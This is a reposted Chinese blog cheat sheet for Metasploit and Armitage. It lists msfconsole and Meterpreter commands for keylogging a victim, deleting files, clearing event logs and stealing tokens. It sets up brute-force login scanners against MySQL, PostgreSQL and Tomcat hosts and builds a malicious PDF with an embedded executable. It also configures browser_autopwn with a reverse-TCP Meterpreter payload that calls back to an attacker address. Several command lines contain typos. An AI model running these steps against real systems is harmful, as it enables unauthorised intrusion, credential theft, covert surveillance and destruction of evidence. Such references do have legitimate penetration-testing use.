博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
msf、armitage
阅读量:5884 次
发布时间:2019-06-19

本文共 2154 字,大约阅读时间需要 7 分钟。

msfconsole的命令:

msfconsole
use module :这个命令允许你开始配置所选择的模块。
set optionname module :这个命令允许你为指定的模块配置不同的选项。
exploit :这个命令启动漏洞利用模块
run :这个命令启动非漏洞利用模块。
search module :这个命令允许你搜索独立模块。
help
exit


msfcli的命令:

msfcli
msfcli [PATH TO EXPLOIT] [options = value] :这是执行漏洞利用的语法。
msf -h


Meterpreter 执行实际的载荷分发和漏洞利用工作:

background :这个命令允许你在后台运行 Meterpreter 会话。这个命令也能为你带回MSF 提示符。
download :这个命令允许你从受害者机器中下载文件。
upload :这个命令允许你向受害者机器上传文件。
execute :这个命令允许你在受害者机器上运行命令。
shell :这个命令允许你在受害者机器上运行 Windows shell 提示符( 仅限于 Windows主机) 。
session -i :这个命令允许你在会话之间切换。


开始记录目标系统中用户的击键顺序:

keyscan_start

转储目标系统中用户的击键顺序。击键顺序会显示在屏幕上:

keyscan_dump

停止记录目标系统中用户的击键顺序。

keyscan_stop

删除目标系统中的文件。

del exploited.docx

清除目标系统中的事件日志。

clearav

展示运行进程的列表。

ps

杀掉受害者系统的指定进程,使用 kill [pid] 语法。

kill 6353

尝试偷取目标系统上的模拟令牌。

steal_token


msfconsole mysql

use auxiliary/scanner/mysql/mysql_login
show options
set RHOST 192.168.10.111
set user_file /root/Desktop/usernames.txt
set pass_file /root/Desktop/passwords.txt
exploit


msfconsole postgresql

use auxiliary/scanner/mysql/postgres_login
show options
set RHOST 192.168.10.111
set user_file /root/Desktop/usernames.txt
set pass_file /root/Desktop/passwords.txt
exploit


msfconsole tomcat

use auxiliary/scanner/http/tomcat_mgr_login
show options
PASS_FILE meset /usr/share/metasploit-framework/data/wordlists/ tomcat_mgr_default_pass.txt
USER_FILE mset /usr/share/metasploit-framework/data/wordlists/ tomcat_mgr_default_pass.txt
set RHOSTS 192.168.10.111
set RPORT 8180
exploit


msfconsole

msfconsole pdf
use exploit/windows/fileformat/adobe_pdf_embedded_exe
show options
set FILENAME evildocument.pdf
set INFILENAME /root/Desktop/willie.pdf
exploit


实现 browser_autopwn:

浏览器 Autopwn 是 Metasploit 提供的辅助模块,在受害者访问网页时,让你能够自动化对它
们的攻击。浏览器 Autopwn 在攻击之前指定客户端的指纹识别,也就是说他不会对 IE 7 尝试
利用 Firefox 的漏洞。基于它的浏览器判断,它决定最适于实施哪个漏洞利用。
msfconsole autopwn
use auxiliary/server/browser_autopwn
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.10.109
set URIPATH "filetypes"
exploit
Metasploit 会在 IP 地址 < IP Address]:8080> 处执行漏洞利用。
当访问者访问这个地址时, browser_autopwn 模块尝试连接用户的机器来建立远程会话。
如果成功的话,Meterpreter 会确认这个会话。使用会话命令来激活它:
session –I 1

转载于:https://www.cnblogs.com/itholidaycn/p/6393910.html

你可能感兴趣的文章
BINGMAPS地图下载及切图和重命名工具使用教程
查看>>
BYTE* To Float*
查看>>
(转)C# 把我所积累的类库全部分享给博友(附件已经上传)
查看>>
Silverlight5 无法切换输入法,无法输入中文的原因及解决初探
查看>>
游戏开发基础:方向键的组合,八方向实现
查看>>
黑书-DP-方块消除 ****
查看>>
MySQL 分区
查看>>
编辑框内容变化,修改列表
查看>>
织梦之路——织梦自定义函数教程
查看>>
分享一个String Replace方法
查看>>
我的架构经验系列文章 - 后端架构 - 语言层面
查看>>
Xamarin向iOS和Android引入C#异步支持
查看>>
DEFERRED_SEGMENT_CREATION
查看>>
设置mysql的默认存储引擎
查看>>
方法定义django admin中 外键下拉框添加过滤(只需要显示我所要的过滤结果)
查看>>
读取手机硬件信息
查看>>
一致哈希
查看>>
spring3: Bean的作用域
查看>>
MongoDB学习笔记(三)--权限 && 导出导入备份恢复 && fsync和锁
查看>>
[原创]用Charles模拟App各种网络带宽测试介绍
查看>>